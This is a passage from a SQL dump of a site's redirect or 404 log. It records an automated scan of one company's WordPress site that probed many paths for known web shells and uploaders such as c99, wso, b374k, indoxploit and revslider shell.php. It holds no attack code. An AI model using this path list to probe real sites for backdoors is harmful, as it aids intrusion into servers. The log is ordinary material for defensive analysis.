00:00:00',301),(51234,'http://3s-technologies.com.tr/en/css/dbtoolkit_import.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:47:43','0000-00-00 00:00:00',301),(51235,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/dbtoolkit_import.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:47:44','0000-00-00 00:00:00',301),(51236,'http://3s-technologies.com.tr/en/wp-admin/images/dbtoolkit_import.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:47:45','0000-00-00 00:00:00',301),(51237,'http://3s-technologies.com.tr/en/images/dbtoolkit_import.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:47:46','0000-00-00 00:00:00',301),(51238,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/dbtoolkit_import.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:47:47','0000-00-00 00:00:00',301),(51239,'http://3s-technologies.com.tr/en/wp-admin/css/colors/dbtoolkit_import.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:47:48','0000-00-00 00:00:00',301),(51240,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/dbtoolkit_import.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:47:49','0000-00-00 00:00:00',301),(51241,'http://3s-technologies.com.tr/en/wp-admin/includes/dbtoolkit_import.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:47:50','0000-00-00 00:00:00',301),(51242,'http://3s-technologies.com.tr/en/wp-includes/js/tinymce/plugins/compat3x/css/index.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:47:52','0000-00-00 00:00:00',301),(51243,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/wp-hoard.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:47:54','0000-00-00 00:00:00',301),(51244,'http://3s-technologies.com.tr/en/wp-admin/network/wp-hoard.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:47:55','0000-00-00 00:00:00',301),(51245,'http://3s-technologies.com.tr/en/cgi-bin/wp-hoard.php',NULL,'https://www.google.de/','',1,0,'2025-12-20 04:47:55','0000-00-00 00:00:00',301),(51246,'http://3s-technologies.com.tr/en/css/wp-hoard.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:47:56','0000-00-00 00:00:00',301),(51247,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/wp-hoard.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:47:57','0000-00-00 00:00:00',301),(51248,'http://3s-technologies.com.tr/en/wp-admin/images/wp-hoard.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:47:58','0000-00-00 00:00:00',301),(51249,'http://3s-technologies.com.tr/en/images/wp-hoard.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:47:59','0000-00-00 00:00:00',301),(51250,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp-hoard.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:48:00','0000-00-00 00:00:00',301),(51251,'http://3s-technologies.com.tr/en/wp-admin/css/colors/wp-hoard.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:01','0000-00-00 00:00:00',301),(51252,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/wp-hoard.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:02','0000-00-00 00:00:00',301),(51253,'http://3s-technologies.com.tr/en/wp-admin/includes/wp-hoard.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:03','0000-00-00 00:00:00',301),(51254,'http://3s-technologies.com.tr/en/wp-admin/images/wp_filemanager.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:48:03','0000-00-00 00:00:00',301),(51255,'http://3s-technologies.com.tr/en/wp-admin/includes/wp_filemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:04','0000-00-00 00:00:00',301),(51256,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/wp_filemanager.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:05','0000-00-00 00:00:00',301),(51257,'http://3s-technologies.com.tr/en/wp-admin/js/wp_filemanager.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:48:06','0000-00-00 00:00:00',301),(51258,'http://3s-technologies.com.tr/en/wp-admin/maint/wp_filemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:07','0000-00-00 00:00:00',301),(51259,'http://3s-technologies.com.tr/en/wp-admin/network/wp_filemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:08','0000-00-00 00:00:00',301),(51260,'http://3s-technologies.com.tr/en/wp-admin/user/wp_filemanager.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:09','0000-00-00 00:00:00',301),(51261,'http://3s-technologies.com.tr/en/wp-content/wp_filemanager.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:48:10','0000-00-00 00:00:00',301),(51262,'http://3s-technologies.com.tr/en/wp-content/uploads/wp_filemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:11','0000-00-00 00:00:00',301),(51263,'http://3s-technologies.com.tr/en/wp-content/plugins/wp_filemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:12','0000-00-00 00:00:00',301),(51264,'http://3s-technologies.com.tr/en/wp-content/languages/wp_filemanager.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:48:13','0000-00-00 00:00:00',301),(51265,'http://3s-technologies.com.tr/en/wp-content/languages/themes/wp_filemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:14','0000-00-00 00:00:00',301),(51266,'http://3s-technologies.com.tr/en/wp-includes/simplepie/wp_filemanager.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:15','0000-00-00 00:00:00',301),(51267,'http://3s-technologies.com.tr/en/wp-includes/certificates/wp_filemanager.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:16','0000-00-00 00:00:00',301),(51268,'http://3s-technologies.com.tr/en/wp-includes/customize/wp_filemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:16','0000-00-00 00:00:00',301),(51269,'http://3s-technologies.com.tr/en/wp-includes/pomo/wp_filemanager.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:48:17','0000-00-00 00:00:00',301),(51270,'http://3s-technologies.com.tr/en/wp-includes/rest-api/wp_filemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:18','0000-00-00 00:00:00',301),(51271,'http://3s-technologies.com.tr/en/index/wp_filemanager.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:20','0000-00-00 00:00:00',301),(51272,'http://3s-technologies.com.tr/en/about/wp_filemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:21','0000-00-00 00:00:00',301),(51273,'http://3s-technologies.com.tr/en/as/wp_filemanager.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:48:22','0000-00-00 00:00:00',301),(51274,'http://3s-technologies.com.tr/en/file/wp_filemanager.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:48:23','0000-00-00 00:00:00',301),(51275,'http://3s-technologies.com.tr/en/chosen/wp_filemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:24','0000-00-00 00:00:00',301),(51276,'http://3s-technologies.com.tr/en/css/wp_filemanager.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:48:25','0000-00-00 00:00:00',301),(51277,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/wp_filemanager.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:48:26','0000-00-00 00:00:00',301),(51278,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/wp_filemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:27','0000-00-00 00:00:00',301),(51279,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/wp_filemanager.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:48:28','0000-00-00 00:00:00',301),(51280,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/wp_filemanager.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:48:29','0000-00-00 00:00:00',301),(51281,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/wp_filemanager.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:29','0000-00-00 00:00:00',301),(51282,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/wp_filemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:30','0000-00-00 00:00:00',301),(51283,'http://3s-technologies.com.tr/en/ajaxfilemanager/wp_filemanager.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:48:31','0000-00-00 00:00:00',301),(51284,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/wp_filemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:32','0000-00-00 00:00:00',301),(51285,'http://3s-technologies.com.tr/en/wp-content/plugins/revslider/includes/external/page/shell.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:34','0000-00-00 00:00:00',301),(51286,'http://3s-technologies.com.tr/en/wp-content/plugins/revslider/includes/external/page/up.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:35','0000-00-00 00:00:00',301),(51287,'http://3s-technologies.com.tr/en/wp-includes/blocks/table/int/tmpl/index.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:37','0000-00-00 00:00:00',301),(51288,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:39','0000-00-00 00:00:00',301),(51289,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:40','0000-00-00 00:00:00',301),(51290,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:48:41','0000-00-00 00:00:00',301),(51291,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:42','0000-00-00 00:00:00',301),(51292,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:48:43','0000-00-00 00:00:00',301),(51293,'http://3s-technologies.com.tr/en/ajaxfilemanager/ajaxfilemanager.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:48:44','0000-00-00 00:00:00',301),(51294,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:44','0000-00-00 00:00:00',301),(51295,'http://3s-technologies.com.tr/en/uploaded_script.php',NULL,'https://www.yahoo.com/','',10,0,'2025-12-20 04:48:45','0000-00-00 00:00:00',301),(51296,'http://3s-technologies.com.tr/en/wp-content/plugins/xwp/up.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:48:47','0000-00-00 00:00:00',301),(51297,'http://3s-technologies.com.tr/en/wp-cli.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:48','0000-00-00 00:00:00',301),(51298,'http://3s-technologies.com.tr/en/admin/images/mini.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:48:49','0000-00-00 00:00:00',301),(51299,'http://3s-technologies.com.tr/en/admin/img/mini.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:50','0000-00-00 00:00:00',301),(51300,'http://3s-technologies.com.tr/en/admin/upload/mini.php',NULL,'https://duckduckgo.com/','',11,0,'2025-12-20 04:48:51','0000-00-00 00:00:00',301),(51301,'http://3s-technologies.com.tr/en/admin/gallery/mini.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:48:52','0000-00-00 00:00:00',301),(51302,'http://3s-technologies.com.tr/en/admin/uploads/mini.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:48:53','0000-00-00 00:00:00',301),(51303,'http://3s-technologies.com.tr/en/admin/uploads/indoxploit.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:53','0000-00-00 00:00:00',301),(51304,'http://3s-technologies.com.tr/en/admin/uploads/idx.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:48:54','0000-00-00 00:00:00',301),(51305,'http://3s-technologies.com.tr/en/admin/uploads/c99.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:55','0000-00-00 00:00:00',301),(51306,'http://3s-technologies.com.tr/en/admin/uploads/wso.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:48:56','0000-00-00 00:00:00',301),(51307,'http://3s-technologies.com.tr/en/admin/uploads/404.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:48:57','0000-00-00 00:00:00',301),(51308,'http://3s-technologies.com.tr/en/admin/uploads/up.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:48:58','0000-00-00 00:00:00',301),(51309,'http://3s-technologies.com.tr/en/admin/uploads/uploader.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:48:59','0000-00-00 00:00:00',301),(51310,'http://3s-technologies.com.tr/en/admin/uploads/shell.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:00','0000-00-00 00:00:00',301),(51311,'http://3s-technologies.com.tr/en/admin/uploads/b374k.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:01','0000-00-00 00:00:00',301),(51312,'http://3s-technologies.com.tr/en/admin/uploads/cgi.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:01','0000-00-00 00:00:00',301),(51313,'http://3s-technologies.com.tr/en/admin/uploads/about.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:02','0000-00-00 00:00:00',301),(51314,'http://3s-technologies.com.tr/en/upl0ad.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:49:07','0000-00-00 00:00:00',301),(51315,'http://3s-technologies.com.tr/en/kontol.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:49:08','0000-00-00 00:00:00',301),(51316,'http://3s-technologies.com.tr/en/memek.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:09','0000-00-00 00:00:00',301),(51317,'http://3s-technologies.com.tr/en/cok.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:49:10','0000-00-00 00:00:00',301),(51318,'http://3s-technologies.com.tr/en/asu.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:11','0000-00-00 00:00:00',301),(51319,'http://3s-technologies.com.tr/en/sayang.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:49:13','0000-00-00 00:00:00',301),(51320,'http://3s-technologies.com.tr/en/puki.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:14','0000-00-00 00:00:00',301),(51321,'http://3s-technologies.com.tr/en/peler.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:49:15','0000-00-00 00:00:00',301),(51322,'http://3s-technologies.com.tr/en/cinta.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:16','0000-00-00 00:00:00',301),(51323,'http://3s-technologies.com.tr/en/admin/images/up.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:16','0000-00-00 00:00:00',301),(51324,'http://3s-technologies.com.tr/en/admin/img/up.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:17','0000-00-00 00:00:00',301),(51325,'http://3s-technologies.com.tr/en/admin/upload/up.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:18','0000-00-00 00:00:00',301),(51326,'http://3s-technologies.com.tr/en/admin/gallery/up.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:49:19','0000-00-00 00:00:00',301),(51327,'http://3s-technologies.com.tr/en/wp-content/plugins/wp-apxupx.php?apx=upx',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:20','0000-00-00 00:00:00',301),(51328,'http://3s-technologies.com.tr/en/wp-admin/wp-apxupx.php?apx=upx',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:49:21','0000-00-00 00:00:00',301),(51329,'http://3s-technologies.com.tr/en/xxl.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:49:27','0000-00-00 00:00:00',301),(51330,'http://3s-technologies.com.tr/en/wp-includes/xxl.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:29','0000-00-00 00:00:00',301),(51331,'http://3s-technologies.com.tr/en/wp-content/xxl.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:30','0000-00-00 00:00:00',301),(51332,'http://3s-technologies.com.tr/en/wp-admin/xxl.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:31','0000-00-00 00:00:00',301),(51333,'http://3s-technologies.com.tr/en/m1.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:32','0000-00-00 00:00:00',301),(51334,'http://3s-technologies.com.tr/en/wwr.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:33','0000-00-00 00:00:00',301),(51335,'http://3s-technologies.com.tr/en/ynz.php7',NULL,'https://www.google.co.uk/','',4,0,'2025-12-20 04:49:34','0000-00-00 00:00:00',301),(51336,'http://3s-technologies.com.tr/en/wp-content/ynz.php7',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:49:35','0000-00-00 00:00:00',301),(51337,'http://3s-technologies.com.tr/en/wp-admin/ynz.php7',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:36','0000-00-00 00:00:00',301),(51338,'http://3s-technologies.com.tr/en/wp-content/pugins/ynz.php7',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:36','0000-00-00 00:00:00',301),(51339,'http://3s-technologies.com.tr/en/fosil.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:37','0000-00-00 00:00:00',301),(51340,'http://3s-technologies.com.tr/en/erin1.php7',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:49:38','0000-00-00 00:00:00',301),(51341,'http://3s-technologies.com.tr/en/wp-content/erin1.php7',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:39','0000-00-00 00:00:00',301),(51342,'http://3s-technologies.com.tr/en/wp-admin/erin1.php7',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:49:40','0000-00-00 00:00:00',301),(51343,'http://3s-technologies.com.tr/en/wp-content/plugins/erin1.php7',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:49:41','0000-00-00 00:00:00',301),(51344,'http://3s-technologies.com.tr/en/ws.php.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:49:42','0000-00-00 00:00:00',301),(51345,'http://3s-technologies.com.tr/en/delete4.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:43','0000-00-00 00:00:00',301),(51346,'http://3s-technologies.com.tr/en/delete5.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:49:44','0000-00-00 00:00:00',301),(51347,'http://3s-technologies.com.tr/en/wp-seo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:49:45','0000-00-00 00:00:00',301),(51348,'http://3s-technologies.com.tr/en/wp-content/alfanew.php7',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:49:46','0000-00-00 00:00:00',301),(51349,'http://3s-technologies.com.tr/en/wp-admin/alfanew.php7',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:47','0000-00-00 00:00:00',301),(51350,'http://3s-technologies.com.tr/en/wp-content/plugins/alfanew.php7',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:48','0000-00-00 00:00:00',301),(51351,'http://3s-technologies.com.tr/en/delete3.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:49:49','0000-00-00 00:00:00',301),(51352,'http://3s-technologies.com.tr/en/wso-x569.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:49:51','0000-00-00 00:00:00',301),(51353,'http://3s-technologies.com.tr/en/wp-header.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:49:52','0000-00-00 00:00:00',301),(51354,'http://3s-technologies.com.tr/en/class-snoopye_wso.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:53','0000-00-00 00:00:00',301),(51355,'http://3s-technologies.com.tr/en/wp-admin/atomlib.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:49:54','0000-00-00 00:00:00',301),(51356,'http://3s-technologies.com.tr/en/wp-uploads-config.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:55','0000-00-00 00:00:00',301),(51357,'http://3s-technologies.com.tr/en/wp-content/atomlib.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:49:57','0000-00-00 00:00:00',301),(51358,'http://3s-technologies.com.tr/en/wp-includes/wp-head.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:49:58','0000-00-00 00:00:00',301),(51359,'http://3s-technologies.com.tr/en/wp-includes/atomlib.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:49:59','0000-00-00 00:00:00',301),(51360,'http://3s-technologies.com.tr/en/wp-includes/network.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:50:01','0000-00-00 00:00:00',301),(51361,'http://3s-technologies.com.tr/en/wp-includes/wp-login.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:50:02','0000-00-00 00:00:00',301),(51362,'http://3s-technologies.com.tr/en/wp-admin/wp-atom.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:50:13','0000-00-00 00:00:00',301),(51363,'http://3s-technologies.com.tr/en/wp-content/wp-atom.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:50:14','0000-00-00 00:00:00',301),(51364,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-atom.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:50:15','0000-00-00 00:00:00',301),(51365,'http://3s-technologies.com.tr/en/wp-admin/gecko.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:50:20','0000-00-00 00:00:00',301),(51366,'http://3s-technologies.com.tr/en/wp-content/gecko.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:50:21','0000-00-00 00:00:00',301),(51367,'http://3s-technologies.com.tr/en/wp-content/plugins/gecko.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:50:22','0000-00-00 00:00:00',301),(51368,'http://3s-technologies.com.tr/en/wp-content/uploads/gecko.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:50:23','0000-00-00 00:00:00',301),(51369,'http://3s-technologies.com.tr/en/wp-content/includes/gecko.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:50:24','0000-00-00 00:00:00',301),(51370,'http://3s-technologies.com.tr/en/mds.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:50:26','0000-00-00 00:00:00',301),(51371,'http://3s-technologies.com.tr/en/wp-content/wp-22.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:50:31','0000-00-00 00:00:00',301),(51372,'http://3s-technologies.com.tr/en/wp-content/uploads/wp-22.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:50:32','0000-00-00 00:00:00',301),(51373,'http://3s-technologies.com.tr/en/403lock.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:50:33','0000-00-00 00:00:00',301),(51374,'http://3s-technologies.com.tr/en/wp-content/themes/twentytwentythree/parts/wp-blog.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:50:34','0000-00-00 00:00:00',301),(51375,'http://3s-technologies.com.tr/en/embed-template-core.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:50:35','0000-00-00 00:00:00',301),(51376,'http://3s-technologies.com.tr/en/wp-includes/inputs.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:50:37','0000-00-00 00:00:00',301),(51377,'http://3s-technologies.com.tr/en/wp-content/uploads/inputs.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:50:38','0000-00-00 00:00:00',301),(51378,'http://3s-technologies.com.tr/en/wp-content/plugins/inputs.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:50:39','0000-00-00 00:00:00',301),(51379,'http://3s-technologies.com.tr/en/images/inputs.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:50:41','0000-00-00 00:00:00',301),(51380,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/inputs.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:50:42','0000-00-00 00:00:00',301),(51381,'http://3s-technologies.com.tr/en/wp-content/themes/inputs.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:50:43','0000-00-00 00:00:00',301),(51382,'http://3s-technologies.com.tr/en/cgi-bin/inputs.php',NULL,'https://www.google.co.uk/','',1,0,'2025-12-20 04:50:45','0000-00-00 00:00:00',301),(51383,'http://3s-technologies.com.tr/en/wp-admin/images/chitoge.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:50:52','0000-00-00 00:00:00',301),(51384,'http://3s-technologies.com.tr/en/wp-admin/includes/chitoge.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:50:53','0000-00-00 00:00:00',301),(51385,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/chitoge.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:50:54','0000-00-00 00:00:00',301),(51386,'http://3s-technologies.com.tr/en/wp-admin/js/chitoge.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:50:55','0000-00-00 00:00:00',301),(51387,'http://3s-technologies.com.tr/en/wp-admin/maint/chitoge.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:50:56','0000-00-00 00:00:00',301),(51388,'http://3s-technologies.com.tr/en/wp-admin/network/chitoge.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:50:57','0000-00-00 00:00:00',301),(51389,'http://3s-technologies.com.tr/en/wp-admin/user/chitoge.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:50:57','0000-00-00 00:00:00',301),(51390,'http://3s-technologies.com.tr/en/wp-content/chitoge.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:50:58','0000-00-00 00:00:00',301),(51391,'http://3s-technologies.com.tr/en/wp-content/uploads/chitoge.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:50:59','0000-00-00 00:00:00',301),(51392,'http://3s-technologies.com.tr/en/wp-content/plugins/chitoge.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:00','0000-00-00 00:00:00',301),(51393,'http://3s-technologies.com.tr/en/wp-content/languages/chitoge.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:01','0000-00-00 00:00:00',301),(51394,'http://3s-technologies.com.tr/en/wp-content/languages/themes/chitoge.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:02','0000-00-00 00:00:00',301),(51395,'http://3s-technologies.com.tr/en/wp-includes/simplepie/chitoge.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:03','0000-00-00 00:00:00',301),(51396,'http://3s-technologies.com.tr/en/wp-includes/certificates/chitoge.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:51:04','0000-00-00 00:00:00',301),(51397,'http://3s-technologies.com.tr/en/wp-includes/customize/chitoge.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 04:51:05','0000-00-00 00:00:00',301),(51398,'http://3s-technologies.com.tr/en/wp-admin/images/file.php',NULL,'https://www.google.fr/','',29,0,'2025-12-20 04:51:06','0000-00-00 00:00:00',301),(51399,'http://3s-technologies.com.tr/en/wp-admin/includes/file.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:06','0000-00-00 00:00:00',301),(51400,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/file.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:07','0000-00-00 00:00:00',301),(51401,'http://3s-technologies.com.tr/en/wp-admin/maint/file.phpv',NULL,'https://www.bing.com/','',2,0,'2025-12-20 04:51:08','0000-00-00 00:00:00',301),(51402,'http://3s-technologies.com.tr/en/wp-admin/network/file.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:09','0000-00-00 00:00:00',301),(51403,'http://3s-technologies.com.tr/en/wp-admin/user/file.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 04:51:10','0000-00-00 00:00:00',301),(51404,'http://3s-technologies.com.tr/en/wp-content/languages/file.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 04:51:11','0000-00-00 00:00:00',301),(51405,'http://3s-technologies.com.tr/en/wp-content/languages/themes/file.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 04:51:12','0000-00-00 00:00:00',301),(51406,'http://3s-technologies.com.tr/en/wp-includes/simplepie/file.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 04:51:13','0000-00-00 00:00:00',301),(51407,'http://3s-technologies.com.tr/en/wp-includes/certificates/file.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 04:51:13','0000-00-00 